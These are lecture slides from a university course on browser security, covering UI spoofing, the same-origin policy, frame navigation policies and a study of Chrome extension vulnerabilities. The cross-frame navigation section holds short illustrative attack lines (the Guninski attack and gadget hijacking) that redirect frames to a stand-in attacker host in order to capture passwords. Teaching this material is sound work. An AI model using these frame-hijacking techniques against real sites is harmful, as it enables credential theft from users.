CSC 495/583 Topics of Software Security Web Browser Security (2) Class16 CSC 495/583 Topics of Software Security Web Browser Security (2) Dr. Si Chen (schen@wcupa.edu)
Internet Explorer Logical Components
Chrome Logical Components
Edge Logical Components
Web Technologies supported by Browsers
Google Chrome Bug Bounty Rewards
Review: UI Spoof
THE LINE OF DEATH (LoD) In web browsers, the browser itself usually fully controls the top of the window, while pixels under the top are under control of the site. If a user trusts pixels above the line of death, the thinking goes, they’ll be safe, but if they can be convinced to trust the pixels below the line, they’re goanna die.
Zone of Death The bigger problem is that some attacker data is allowed above the LoD; while trusting the content below the LoD will kill your security, there are also areas of death above the line. A more accurate Zones of Death map might look like this:
CVE-2017-5072 RTL character in URL flips domain and path (Android 4.2 and earlier)
Status Bar Spoofing
Document object model (DOM) Data structure manipulated by JavaScript web page in HTML is structured data DOM provides representation of this hierarchy Examples Properties: document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ] Methods: document.write(document.referrer) Also Browser Object Model (BOM) Window, Document, Frames[], History, Location, Navigator (type and version of browser)
Browser and document tree structure W3C standard differs from models supported in existing browsers
Components of browser security policy
Components of browser security policy Frame-Frame relationships canScript(A,B) Can Frame A execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B? canNavigate(A,B) Can Frame A change the origin of content for Frame B? Frame-principal relationships readCookie(A,S), writeCookie(A,S) Can Frame A read/write cookies from site S? Security indicator (lock icon) securityIndicator(W) Is the security indicator displayed for window W?
Generally misunderstood Often simply stated as “same origin policy” This usually just refers to the canScript relation Full policy of current browsers is complex Evolved via “penetrate-and-patch” Different features evolved slightly different policies Common scripting and cookie policies: canScript considers: scheme, host, and port canReadCookie considers: scheme, host, and path canWriteCookie considers: host
Cross-frame scripting canScript(A,B) Only if Origin(A) = Origin(B) Where origin of a frame is the scheme, host, and network port from which it was loaded This is the basic Same-Origin Policy (SOP) Some details Some properties can be read anyway Example: A can read size of B, if A is the parent of B in the DOM hierarchy
Cross-Frame Navigation Who decides a frame’s content? Permissive policy is used in some browsers; not a great idea A frame can navigate any frame Permissive Policy
Guninski Attack awglogin window.open("https://www.attacker.com/...", "awglogin") window.open("https://www.google.com/...") If bad frame can navigate good frame, attacker gets password
frames in its own window A frame can navigate frames in its own window Window Policy
Gadget Hijacking top.frames[1].location = "http:/www.attacker.com/...“; top.frames[2].location = "http:/www.attacker.com/...“; ...
Gadget Hijacking
Browser Extensions
Web Extension Architecture Overview A Web Extension has a very similar structure to the one found for HTML websites handling folders and their respective data. The extension file itself is nothing but a compressed folder structure containing HTML files, JavaScript, HTML, CSS, images, audio, and so on
CHROME EXTENSIONS
CHROME EXTENSIONS
WEB ATTACKER servers servers client-side website extension client-side browser API history bookmarks website WEB ATTACKER
WEB ATTACKER servers servers client-side website extension client-side browser API history bookmarks website WEB ATTACKER
NETWORK ATTACKER servers servers client-side website extension browser API history bookmarks NETWORK ATTACKER
NETWORK ATTACKER servers servers client-side website extension browser API history bookmarks NETWORK ATTACKER
CHROME’S SECURITY MECHANISMS
PRIVILEGE SEPARATION servers servers client-side website content script core extension extension browser API history bookmarks PRIVILEGE SEPARATION
ISOLATED WORLDS servers servers content script core extension client-side website content script extension client-side website browser API history bookmarks ISOLATED WORLDS
PERMISSIONS servers server server content script core extension client-side website extension client-side website browser API history bookmarks PERMISSIONS
FINDING BUGS SAMPLE METHODS VERIFICATION 50 most popular + 50 random extensions METHODS Black-box testing + source code analysis VERIFICATION Built exploits to confirm the vulnerabilities
VULNERABLE EXTENSIONS Popular Random Total 22 18 40 VULNERABLE EXTENSIONS
Example. The Speeddial extension replicates Chrome’s built-in list of recently closed pages. Speeddial keeps track of the tabs opened using the tabs manager and does not sanitize the titles of these pages before adding them to the HTML of one of its core extension pages. If a title were to contain an inline script, it would execute with the core extension’s permissions. EXAMPLE: SPEED DIAL
ISOLATED WORLDS
Need for isolation If Googkle can script other windows, then can steal passwords, post fraudulent bank or retail transactions, etc., etc.
Need for isolation - mashups
Need for isolation - advertisements
Browser and document tree structure W3C standard differs from models supported in existing browsers
Vulnerability count: 3 content script vulns
DATA AS HTML MISTAKE MITIGATION VULNERABILITIES Insert data as HTML, where it can execute MITIGATION Will execute in website’s isolated world VULNERABILITIES 6 extensions have data-as-HTML bugs that don’t cause content script vulnerabilities
EVAL MISTAKE MITIGATION VULNERABILITIES Use eval to execute untrusted data MITIGATION Isolated worlds does not mitigate this bug VULNERABILITIES 2 vulnerabilities due to this mistake
CLICK INJECTION MISTAKE MITIGATION VULNERABILITIES Trusting event handlers on a website MITIGATION Isolated worlds does not mitigate this bug VULNERABILITIES 1 vulnerability due to this mistake
Isolated worlds is highly effective because it mitigates common bugs
PRIVILEGE SEPARATION
Privilege separation: protect core extensions
PRIVILEGE SEPARATION client-side website content script core extension browser API history bookmarks PRIVILEGE SEPARATION
Vulnerability count: 50 core extension vulns
METADATA ATTACK servers core content script client-side website extension extension browser API history bookmarks METADATA ATTACK
Example. The Speeddial extension replicates Chrome’s built-in list of recently closed pages. Speeddial keeps track of the tabs opened using the tabs manager and does not sanitize the titles of these pages before adding them to the HTML of one of its core extension pages. If a title were to contain an inline script, it would execute with the core extension’s permissions. EXAMPLE: SPEED DIAL
HTTP SCRIPTS/XHRS servers core extension content script client-side website content script core extension extension browser API history bookmarks HTTP SCRIPTS/XHRS
PERMISSIONS
Javascript Security Model “Sandbox” design No direct file access, restricted network access Same-origin policy Frame can only read properties of documents and windows from same place: server, protocol, port However, this does not apply to Script loaded in enclosing frame from arbitrary site This script runs as if it were loaded from the site that provided the page! <script type="text/javascript"> src="http://www.example.com/scripts/somescript.js"> </script> Reference: http://www.devarticles.com/c/a/JavaScript/JavaScript-Security/
Cross-Origin XMLHttpRequest Regular web pages can use the XMLHttpRequest object to send and receive data from remote servers, but they're limited by the same origin policy. Extensions aren't so limited. An extension can talk to remote servers outside of its origin, as long as it first requests cross-origin permissions.
Permissions: limit the scope of core vulnerabilities
PERMISSION RATE None 15% Low High 44% 11% Medium 30% 27 buggy extensions PERMISSION RATE
Reduces potential for severe attacks by half
RATE COMPARISON None 15% Low High 44% 11% Medium 30% None 1% Low 12% with bugs others RATE COMPARISON
No correlation between bugs and permissions
Yes, permissions limit the scope of vulnerabilities